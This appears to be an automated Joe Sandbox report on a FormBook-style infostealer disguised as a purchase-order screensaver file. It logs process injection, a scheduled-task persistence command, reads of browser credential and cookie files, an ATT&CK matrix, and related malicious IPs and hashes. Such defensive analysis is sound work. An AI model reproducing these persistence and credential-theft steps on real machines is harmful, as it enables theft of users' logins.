                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtRequestWaitReplyPort: Direct from: 0x753C6BCE
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtQueryValueKey: Direct from: 0x774CFACA
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtOpenSection: Direct from: 0x774CFDEA
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtTerminateThread: Direct from: 0x774D00A6
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtProtectVirtualMemory: Direct from: 0x774D005A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtWriteVirtualMemory: Direct from: 0x774CFE36
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtRequestWaitReplyPort: Direct from: 0x756F8D92
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtQueryVolumeInformationFile: Direct from: 0x774CFFAE
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtNotifyChangeKey: Direct from: 0x774D0F92
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtQueryAttributesFile: Direct from: 0x774CFE7E
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtReadVirtualMemory: Direct from: 0x774CFEB2
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtSetTimer: Direct from: 0x774E98D5
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtSetInformationFile: Direct from: 0x774CFC5A
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe NtQuerySystemInformation: Direct from: 0x774CFDD2
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe protection: execute and read and write
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe Section loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msinfo32.exe Section loaded: NULL target: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe protection: read write
                Source: C:\Windows\SysWOW64\msinfo32.exe Section loaded: NULL target: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msinfo32.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\msinfo32.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msinfo32.exe Thread APC queued: target process: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\PEJmengI.exe C:\Users\user\AppData\Roaming\PEJmengI.exe
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp"
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
                Source: C:\Windows\SysWOW64\msinfo32.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                Source: mrNbohrgjTw.exe, 0000000B.00000002.873762675.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000000.379732205.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409275570.0000000000D10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
                Source: mrNbohrgjTw.exe, 0000000B.00000002.873762675.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000000.379732205.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409275570.0000000000D10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: mrNbohrgjTw.exe, 0000000B.00000002.873762675.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 0000000B.00000000.379732205.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000000.409275570.0000000000D10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Queries volume information: C:\Users\user\Desktop\RFQ_P.O.1212024.scr VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exe Queries volume information: C:\Users\user\AppData\Roaming\PEJmengI.exe VolumeInformation
                Source: C:\Windows\SysWOW64\msinfo32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\jz-tmbi.zip VolumeInformation
                Source: C:\Windows\SysWOW64\msinfo32.exe Code function: 12_2_61E91E90 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_61E91E90
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Windows\SysWOW64\msinfo32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msinfo32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\msinfo32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\msinfo32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\msinfo32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

                Remote Access Functionality

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Browser Session Hijacking | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 512 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 16 System Information Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Scheduled Task/Job | 4 Obfuscated Files or Information | NTDS | 2 Security Software Discovery | Distributed Component Object Model | 1 Email Collection | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 512 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph: ID 1573579, sample RFQ_P.O.1212024.scr, start date 12/12/2024, architecture WINDOWS, score 100]

                Source | Detection | Scanner | Label | Link
                RFQ_P.O.1212024.scr | 39% | Virustotal | | Browse
                RFQ_P.O.1212024.scr | 100% | Joe Sandbox ML | |
                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\PEJmengI.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Local\Temp\sqlite3.dll | 0% | ReversingLabs | |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                Name | Malicious | Antivirus Detection | Reputation
                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drfalse
                                                                                      high
                                                                                      http://www.sqlite.org/copyright.html.msinfo32.exe, 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.drfalse
                                                                                        high
                                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.drfalse
                                                                                          high
                                                                                          https://www.strato.demrNbohrgjTw.exe, 00000014.00000002.873893935.00000000040B8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1573579
Start date and time: 2024-12-12 10:18:46 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ_P.O.1212024.scr
Detection: MAL
Classification: mal100.troj.spyw.evad.winSCR@24/18@25/15
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 100
• Number of non-executed functions: 229
Cookbook Comments:
• Found application associated with file extension: .scr
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mrNbohrgjTw.exe, PID 1696 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:19:46 | Task Scheduler | Run new task: PEJmengI path: C:\Users\user\AppData\Roaming\PEJmengI.exe
04:19:38 | API Interceptor | 89x Sleep call for process: RFQ_P.O.1212024.scr modified
04:19:45 | API Interceptor | 3x Sleep call for process: schtasks.exe modified
04:19:45 | API Interceptor | 109x Sleep call for process: powershell.exe modified
04:19:47 | API Interceptor | 397x Sleep call for process: taskeng.exe modified
04:19:49 | API Interceptor | 118x Sleep call for process: PEJmengI.exe modified
04:20:12 | API Interceptor | 4808x Sleep call for process: mrNbohrgjTw.exe modified
04:20:17 | API Interceptor | 12821512x Sleep call for process: msinfo32.exe modified
                                                                                            • 81.2.196.19
                                                                                            89778Cpy.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            UNGSno5k4G.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.2.196.19
                                                                                            PLANETHOSTER-8CAPO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 146.88.233.115
                                                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 146.88.233.115
                                                                                            Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 146.88.233.115
                                                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                            • 146.88.234.239
                                                                                            LINODE-APLinodeLLCUSOutstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                            • 178.79.184.196
                                                                                            rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 212.71.233.17
                                                                                            la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                            • 178.79.182.90
                                                                                            la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                            • 50.116.24.57
                                                                                            BlOgLNwCom.exeGet hashmaliciousXenoRATBrowse
                                                                                            • 96.126.118.61
                                                                                            i586.elfGet hashmaliciousUnknownBrowse
                                                                                            • 172.104.31.172
                                                                                            AS6xKJzYJT.exeGet hashmaliciousPython Stealer, XenoRATBrowse
                                                                                            • 96.126.118.61
                                                                                            1OaTX8zI4B.exeGet hashmaliciousXenoRATBrowse
                                                                                            • 96.126.118.61
                                                                                            yliGAnBiRb.exeGet hashmaliciousUnknownBrowse
                                                                                            • 96.126.118.61
                                                                                            5Xt3byH0Pj.exeGet hashmaliciousXenoRATBrowse
                                                                                            • 96.126.118.61
                                                                                            No context
Match: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Associated Sample Name / URL; Detection; Threat Name
BILL OF LADDING.exe; malicious; FormBook
PO#86637.exe; malicious; FormBook
PO AFHOR9301604.exe; malicious; FormBook
5890796959.xls; malicious; FormBook
PI_order_No202307110.doc; malicious; FormBook
,2,3,4,5.xls; malicious; FormBook
DBK_+_RODTEP-checking_List.xls; malicious; FormBook
mv Dragonball.xlsx; malicious; FormBook
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                            Malicious:false
                                                                                                            Preview:@...e...........................................................
                                                                                                            Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                            Category:dropped
                                                                                                            Size (bytes):480281
                                                                                                            Entropy (8bit):7.998782566236935
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:12288:Ksi/2nEints+5aKe3l6U67lCctqaihd3lnWt/RUNaprnP+vfkD:Kj/3Ka+5He3l6U6JCE43lWt+N2P+vsD
                                                                                                            MD5:2555518E014ABDA6AB2156ACEAA4C25C
                                                                                                            SHA1:DBFA5BE3E5AB5705BEA72C62591D1856A69E99A5
                                                                                                            SHA-256:81F30FFED254F6660EDA1845240DA62F1A73E94DBAE6DDB564F982825C7E99FE
                                                                                                            SHA-512:6984F9BFF3FACF693DCF4D22883E402EBFE673305AB0395EA52881109EA2B467B7D61567E3E8A0CA7FF01A3969FB8E0E384790333C7F5807EAD1EF190623C6AC
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                            Category:dropped
                                                                                                            Size (bytes):77824
                                                                                                            Entropy (8bit):1.133993246026424
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                            MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                            SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                            SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                            SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):5537
                                                                                                            Entropy (8bit):4.352267516149359
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:GcuN/gR+7Ogn0XRMcGM3KOGOF++BwIMtvrENw+Y0aR:E/Q+7Ogn0RKOBF+++HvrENw+cR
                                                                                                            MD5:E8FDCAF1419C66D9916AD24D2FD671EE
                                                                                                            SHA1:E82EFDBB5561810E9EBBF80185642821F1B9D17E
                                                                                                            SHA-256:CB18BFE294499FEA8EE847148DD497DD20A05B3181E6B6AE8651B24B3D29391B
                                                                                                            SHA-512:B66EC534893F19152945BE4F717C2BD0542D88F43C57398CA5B61C74978A8FBB38A8E7144D104E5B254B50E1BCC9F158CA183A1D472708DA1A4AA356DEA9569F
                                                                                                            Malicious:false
                                                                                                            Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum
                                                                                                            Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):916693
                                                                                                            Entropy (8bit):6.515298049291402
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:uY80dlS9SDd59YfRAbaJJs1E8NIGG6lmd//V:uY8iSa2RAbaJJsO8NIGGoG
                                                                                                            MD5:1EB6ACF76A15B74B38333AF47DC1218D
                                                                                                            SHA1:A3FBC817F59B6A8899DC338CC15A75CDD17DFFF1
                                                                                                            SHA-256:A5EF3A78EB333B0E6DCA194EA711DCBB036119A788ECFE125F05176FB0FB70A3
                                                                                                            SHA-512:717931AA928DE150ABBB70D523C7DBD472BFA6C511AB55E0B50DF8D9661D33635156ED7B750285FA383CDD4064F225EA022F0BEAD3E066EE2BEBA84EF5731C15
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: BILL OF LADDING.exe, Detection: malicious, Browse
                                                                                                            • Filename: PO#86637.exe, Detection: malicious, Browse
                                                                                                            • Filename: PO AFHOR9301604.exe, Detection: malicious, Browse
                                                                                                            • Filename: 5890796959.xls, Detection: malicious, Browse
                                                                                                            • Filename: PI_order_No202307110.doc, Detection: malicious, Browse
                                                                                                            • Filename: ,2,3,4,5.xls, Detection: malicious, Browse
                                                                                                            • Filename: DBK_+_RODTEP-checking_List.xls, Detection: malicious, Browse
                                                                                                            • Filename: mv Dragonball.xlsx, Detection: malicious, Browse
